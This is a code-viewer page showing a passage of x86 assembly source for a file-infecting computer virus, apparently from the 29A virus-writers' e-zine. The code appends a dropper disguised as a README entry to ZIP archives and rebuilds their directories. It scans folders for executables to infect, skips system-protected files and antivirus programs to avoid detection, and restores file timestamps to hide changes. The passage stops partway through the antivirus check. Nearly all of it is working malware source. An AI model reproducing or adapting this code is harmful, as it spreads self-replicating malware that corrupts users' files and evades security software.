📄 29a-7.006
字号:
xor eax,eax
push eax
push eax
push eax
push dword 4
push eax
push dword [fHnd+ebp]
call dword [_CreateFileMappingA+ebp]
or eax,eax
jz near infectionErrorCloseZIP
mov dword [fhmap+ebp],eax
xor eax,eax
push eax
push eax
push eax
push dword 6
push dword [fhmap+ebp]
call dword [_MapViewOfFile+ebp]
or eax,eax
jz near infectionErrorCloseMapZIP
mov [mapMem+ebp],eax
; don't rely too much on next part XD
; using ZIP32 for tests
add eax,[fileSize+ebp]
sub eax,16h
mov edx,[eax]
cmp edx,06054b50h ; a ZIP archive?
jne near infectionErrorCloseMapZIP
mov edx,[eax+10h] ; already infected?
add edx,[mapMem+ebp]
cmp dword [edx+2eh],"READ"
jne notFoundZIP
cmp dword [edx+2eh+4],"ME.E"
je near infectionErrorCloseMapZIP
notFoundZIP:
mov cl,[edx+4] ; get some things from
mov [ZIPCver+ebp],cl ; this entry to be less
mov cl,[edx+5] ; suspicious
mov [ZIPCos+ebp],cl
mov cx,[edx+0ch]
mov [ZIPCtim+ebp],cx
mov cx,[edx+0eh]
mov [ZIPCDat+ebp],cx
mov cl,[edx+06h]
mov [ZIPCvxt+ebp],cl
mov cl,[edx+07h]
mov [ZIPCeXos+ebp],cl
; now load our droper
xor eax,eax
push eax
push dword 00000007h
push dword 00000003h
push eax
push eax
push dword 80000000h
lea esi,[dropName+ebp] ; our dropper
push esi
call dword [_CreateFileA+ebp]
inc eax
jz near infectionErrorCloseMapZIP
dec eax
push eax
push dword 0
push eax
call dword [_GetFileSize+ebp]
pop ebx
inc eax
jz near infectionErrorCloseMapZIP
dec eax
add [fileSize+ebp],eax ; new size
add dword [fileSize+ebp],EndOfCentral-LocalHeader
mov [ZIPSize+ebp],eax ; update ZIP header
mov [ZIPUncmp+ebp],eax
mov [ZIPCsiz+ebp],eax
mov [ZIPCunc+ebp],eax
push ebx
xor eax,eax
push eax
push eax
push eax
push dword 2
push eax
push ebx
call dword [_CreateFileMappingA+ebp]
pop ebx
or eax,eax
jz near infectionErrorCloseMapZIP
push ebx
push eax
mov ebx,eax
xor eax,eax
push eax
push eax
push eax
push dword 4
push ebx
call dword [_MapViewOfFile+ebp]
pop edx
pop ebx
or eax,eax
jz near infectionErrorCloseMapZIP
mov [wideBuffer+ebp],eax ; view of file
mov [wideBuffer+4+ebp],edx ; file mapping
mov [wideBuffer+8+ebp],ebx ; file handle
mov esi,eax ; get virus CRC32
mov edi,[ZIPSize+ebp]
call CRC32
mov [ZIPCCrc+ebp],eax
mov [ZIPCrc+ebp],eax
xor eax,eax
push eax
push dword [fileSize+ebp]
push eax
push dword 4
push eax
push dword [fHnd+ebp]
call dword [_CreateFileMappingA+ebp]
or eax,eax
jz near infectionErrorCloseZIP
mov [fhmap+ebp],eax
xor eax,eax
push dword [fileSize+ebp]
push eax
push eax
push dword 6
push dword [fhmap+ebp]
call dword [_MapViewOfFile+ebp]
or eax,eax
jz near infectionErrorCloseMapZIP
mov [mapMem+ebp],eax
add eax,[dummy+ebp] ; size of the old zip
sub eax,16h ; end header
mov ecx,[eax+0ch] ; size of central dir
add ecx,16h ; last header
mov esi,[mapMem+ebp]
add esi,[eax+10h] ; start of dir
mov edi,[mapMem+ebp]
add edi,[fileSize+ebp]
sub edi,ecx ; new address
add edi,ecx ; we must copy it
add esi,ecx ; reversed
; move the central dir
dec esi
dec edi
moveCentralDir:
lodsb
sub esi,2
stosb
sub edi,2
dec ecx
jnz moveCentralDir
mov eax,[mapMem+ebp] ; new addres of the
add eax,[fileSize+ebp] ; header
sub eax,16h
; now add our central entry
mov edi,[mapMem+ebp]
mov edx,[ZIPSize+ebp]
add edx,CentralHeader-LocalHeader
add [eax+10h],edx ; fix offset
add edi,[eax+10h]
lea esi,[CentralHeader+ebp]
mov ecx,EndOfCentral-CentralHeader
rep movsb ; add our central entry
mov esi,edi ; 1st non viral entry
mov ecx,EndOfCentral-CentralHeader
add [eax+0ch],ecx ; fix size
inc word [eax+0ah] ; one more entry
inc word [eax+08h] ; once again
; now fix the directories offsets
movzx ecx,word [eax+0ah] ; num of entries
dec ecx ; skip viral one
mov ebx,[ZIPSize+ebp]
add ebx,CentralHeader-LocalHeader ; increase len
fixZIPDirLoop:
add [esi+2ah],ebx ; fix offset
mov edx,2eh
add dx,[esi+1ch]
add dx,[esi+1eh]
add dx,[esi+20h] ; dir total size
add esi,edx
loop fixZIPDirLoop
; now process local entries
mov ebx,[ZIPSize+ebp]
add ebx,CentralHeader-LocalHeader
mov ecx,[eax+10h] ; offs central = local len
sub ecx,ebx
mov esi,[mapMem+ebp] ; 1st local
mov edi,esi
add edi,ebx ; new local place
add esi,ecx ; goto end to move from
add edi,ecx ; bottom to top
; move local entries to its new place
dec esi
dec edi
moveLocalZIP:
lodsb
sub esi,2
stosb
sub edi,2
dec ecx
jnz moveLocalZIP
mov edi,[mapMem+ebp]
lea esi,[LocalHeader+ebp]
mov ecx,CentralHeader-LocalHeader
rep movsb ; copy our local header
mov ecx,[ZIPSize+ebp]
mov esi,[wideBuffer+ebp]
rep movsb ; and copy the dropper
push dword [wideBuffer+ebp]
call dword [_UnmapViewOfFile+ebp]
push dword [wideBuffer+4+ebp]
call dword [_CloseHandle+ebp]
push dword [wideBuffer+8+ebp]
call dword [_CloseHandle+ebp] ; dropper released
infectionErrorCloseUnmapZIP:
push dword [mapMem+ebp]
call dword [_UnmapViewOfFile+ebp]
infectionErrorCloseMapZIP:
push dword [fhmap+ebp]
call dword [_CloseHandle+ebp]
lea eax,[fileTime2+ebp]
push eax
add eax,-8
push eax
add eax,-8
push eax
push dword [fHnd+ebp]
call dword [_SetFileTime+ebp]
infectionErrorCloseZIP:
push dword [fHnd+ebp]
call dword [_CloseHandle+ebp]
infectionErrorAttribZIP:
pop esi
push dword [fileAttrib+ebp]
push esi
call dword [_SetFileAttributesA+ebp]
infectionErrorZIP:
ret
; - archive.inc EOF -
; - findf.inc BOF -
;
; Simply scan current folder for files to infect
;
scandirpe:
lea eax,[finddata+ebp]
push eax
lea eax,[fmask+ebp]
push eax
call dword [_FindFirstFileA+ebp]
inc eax
jz near notFound
dec eax
mov dword [findHnd+ebp],eax
findNext:
mov eax,dword [nFileSizeLow+ebp] ; avoid small files
cmp eax,4000h
jb near skipThisFile
mov ecx,PADDING ; avoid already
xor edx,edx ; infected files
div ecx
or edx,edx
jz near skipThisFile
lea esi,[cFileName+ebp]
call isAV
jc near skipThisFile
mov eax,[_SfcIsFileProtected+ebp] ; we have sfc?
or eax,eax
jz near sfcNotAvailable
; hehe i've noticed SfcIsFileProtected requires
; a wide string not the ansi one... shit
; moreover sfc only manages full path names :/
; i'm glad with win2000 to test all this things =]
push dword 260 ; 260 wide chars
lea edi,[wideBuffer+ebp]
push edi ; wide buffer
xor eax,eax
dec eax
push eax ; -1 (zstring)
push esi ; ANSI
inc eax
push eax ; 0
push eax ; CP_ACP == 0
call dword [_MultiByteToWideChar+ebp]
or eax,eax
jz skipThisFile ; damn
lea esi,[dummy+ebp]
push esi
lea esi,[wideBuffer2+ebp]
push esi
push dword 260
lea esi,[wideBuffer+ebp]
push esi
call dword [_GetFullPathNameW+ebp]
or eax,eax
jz skipThisFile ; damn (2)
lea esi,[wideBuffer2+ebp]
push esi
push dword 0
call dword [_SfcIsFileProtected+ebp] ; check this file
or eax,eax
jnz skipThisFile
sfcNotAvailable:
lea esi,[cFileName+ebp]
call infectpe
skipThisFile:
lea eax,[finddata+ebp]
push eax
push dword [findHnd+ebp]
call dword [_FindNextFileA+ebp]
or eax,eax
jnz near findNext
endScan:
push dword [findHnd+ebp]
call dword [_FindClose+ebp]
notFound:
ret
; make the ASCII string uppercase and look for some stringz usual in
; antiviral software to avoid infect them
isAV:
push esi
UCaseLoop:
cmp byte [esi],'a'
jb notUCase
cmp byte [esi],'z'
ja notUCase
sub byte [esi],'a'-'A'
notUCase:
lodsb
or al,al
jnz UCaseLoop
mov esi,[esp]
avStrLoop:
mov ax,word [esi]
not ax
cmp ax,~'AV'
je itIsAV
cmp ax,~'DR'
je itIsAV
cmp ax,~'SP'
je itIsAV
cmp ax,~'F-'
je itIsAV
cmp ax,~'AN'
je itIsAV
cmp ax,~'VE'
je itIsAV
cmp ax,~'CL'
je itIsAV
cmp ax,~'ON'
je itIsAV
not ax
inc esi
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -